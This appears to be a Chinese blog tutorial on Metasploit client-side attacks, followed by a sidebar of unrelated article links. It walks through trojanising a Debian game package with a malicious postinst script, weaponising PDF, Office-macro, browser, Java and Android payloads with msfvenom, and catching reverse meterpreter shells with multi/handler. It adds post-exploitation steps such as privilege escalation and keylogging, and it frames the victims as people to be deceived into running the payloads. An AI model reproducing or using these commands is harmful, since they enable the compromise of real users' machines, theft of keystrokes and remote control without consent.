当前位置:网站首页>Metasploit——客户端渗透
Metasploit——客户端渗透
2022-08-10 22:53:00 【隐身的菜鸟】
目录
2.诱骗被害者执行Payload (Linux Deb安装包)
3. 利用Acrobat Reader漏洞执行payload
在无法突破网络边界的情况下转而攻击客户端
1.含有漏洞利用代码的WEB站点:利用客户端漏洞
2.社会工程学:骗取敏感信息,诱使目标执行含有漏洞利用代码的DOC、PDF等Payload
LHOST:反弹连接的目标IP地址
LPORT:反弹连接的目标端口
-a:指定目标系统的硬件架构
--platform:指定目标运行平台
-p:指定payload
-b:去掉坏字符
-e:使用编码模块
-i:编码次数
-f:指定输出文件格式
-o:输出文件名
1.诱骗被害者执行Payload (windows)
只要目标客户端执行制作的exe文件,就可获得目标shell
2.诱骗被害者执行Payload (Linux Deb安装包)
apt-get --download-only install freesweep
#只需要dep文件,加上参数–download-only,下载好的文件保存在/var/cache/qpt/archives
dpkg -x freesweep_0.90-1 i386.deb free
#解压缩文件,到指定目录free下
mkdir free/DEBIAN && cd free/DEBIAN
vi control
Package: freesweep
Version: 1.0.1-1
Section: Games and Amusement
Priority: optional
Architecture: i386
Maintainer: Ubuntu MOTU Developers ([email protected])
Description: a text-based minesweeper
Freesweep is an implementation of the popular minesweeper game, where
one tries to find all the mines without igniting any, based on hints given
by the computer. Unlike most implementations of this game, Freesweep
works in any visual text display - in Linux console, in an xterm, and in
most text-based terminals currently in use.
vi postinst
#!/bin/sh
sudo chmod 2755 /usr/games/freesweep_scores && /usr/games/
freesweep_scores & /usr/games/freesweep &
......
#将/root/下的free.deb,传给目标
-----------------------------------------------------------------------
msfconsole启动侦听
use exploit/multi/handler
set payload linux/x86/shell/reverse_tcp
set ......
exploit(开启侦听)
只要目标安装该文件,侦听的端口就会获得反弹的shell
3. 利用Acrobat Reader漏洞执行payload
(1) 构造PDF文件,诱使目标点击,只要目标用Acrobat Reader执行PDF文件,就可反弹shell
exploit/windows/fileformat/adobe_utilprintf
set payload windows/meterpreter/reverse_tcp
exploit
use exploit/multi/handler(开启侦听)
set payload windwos/meterpreter/reverse_tcp
exploit
(2)构造恶意网站
目标访问恶意网站,漏洞利用代码会执行,进一步执行payload,然后反弹shell
#获得meterpreter
>getuid #进程
>migrate 856 #迁移
>use priv #提权
>run post/windows/capture/keylog_recorder #取到shell的进一步攻击,键盘记录(post模块)
4. 利用Flash漏洞执行payload
设置反弹shell,设置跟构造恶意网站一样
5.利用IE浏览器漏洞执行payload
use exploit/windows/browser/ms14_064_ole_code_execution
set payload windows/meterpreter/reverse_tcp
exploit
6.利用JRE漏洞执行payload
设置payload: set payload java/meterpreter/reverse_tcp
生成这个payload,就要生成一个安卓系统上可用的安装包文件,比如说一个.apk的安装包
-p android平台安卓,-t raw原始格式
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
7.VBScript感染方式
VBScript感染方式
- 利用宏感染word、excel文档
- 绕过某些基于文件类型检查的安全机制
- 生成vbscript脚本msfvenom -a x86 --platform windows -p windows/meterpreter
/reverse_tcp LHOST=x.x.x.x LPORT=4444 - e x86/shikata_ga_nai -f vba-exe
Office 2007 +(office版本2007以上)
新建word文档,选择视图一一宏一一创建
在创建的宏里粘入Payload第一部分的VBA代码
由 Sub Auto_Open() Goepu12 End Sub 到 Sub Workbook_Open() Auto_Open End Sub
word文档正文沾入Payload第二部分的内容
由Jjiktezjhl到最后
Msf启动侦听
- use exploit/multi/handler
- set payload windows/meterpreter/reverse_tcp
目标打开office,可获得shell
边栏推荐
- 怼不过产品经理?因为你不懂DDD领域建模与架构设计
- The Missing Semester of Your CS Education
- 有趣并发性能分享:线程池为什么设计成这样?
- 开源一夏 | 盘点那些 Golang 标星超过 20 K 的优质项目
- 二叉树 | 翻转二叉树 | leecode刷题笔记
- ASCII, Unicode and UTF-8
- ArcGIS中的坐标系统和投影变换
- KRONES克朗斯电源维修0-901-17-350-8技术概论
- XSLeaks 侧信道攻击 (unfinished)
- This visual tool artifact is more intuitive and easy to use!love so much
猜你喜欢
随机推荐
Flink(Pometheus监控)
二叉树 | 递归遍历 | leecode刷题笔记
RK3399 platform development series explanation (kernel-driven peripherals) 6.35, IAM20680 gyroscope introduction
62.【彻底改变你对C语言指针的厌恶(超详细)】
ASCII, Unicode and UTF-8
Ndk 和Cmake报错解决
XSLeaks 侧信道攻击 (unfinished)
《DevOps围炉夜话》- Pilot - CNCF开源DevOps项目DevStream简介 - feat. PMC成员胡涛
诺诚健华通过注册:施一公家族身价15亿 高瓴浮亏5亿港元
常用代码扩展点设计方式
Btree索引和Hash索引
【MySQL】mysql因为字符集导致left join出现Using join buffer (Block Nested Loop)
What would happen if disconnecting during the process of TCP connection?
HGAME 2022 Final Pokemon v2 writeup
MySQL:MySQL的集群——主从复制的原理和配置
二叉树 | 对称二叉树、相同的树、子树相同 | leecode刷题笔记
分享一个后台管理系统可拖拽式组件的设计思路
Apache Doris支持的数据类型详解
Mysql's partial table master-slave construction and new table
【秋招】【更新中ing】手撕代码系列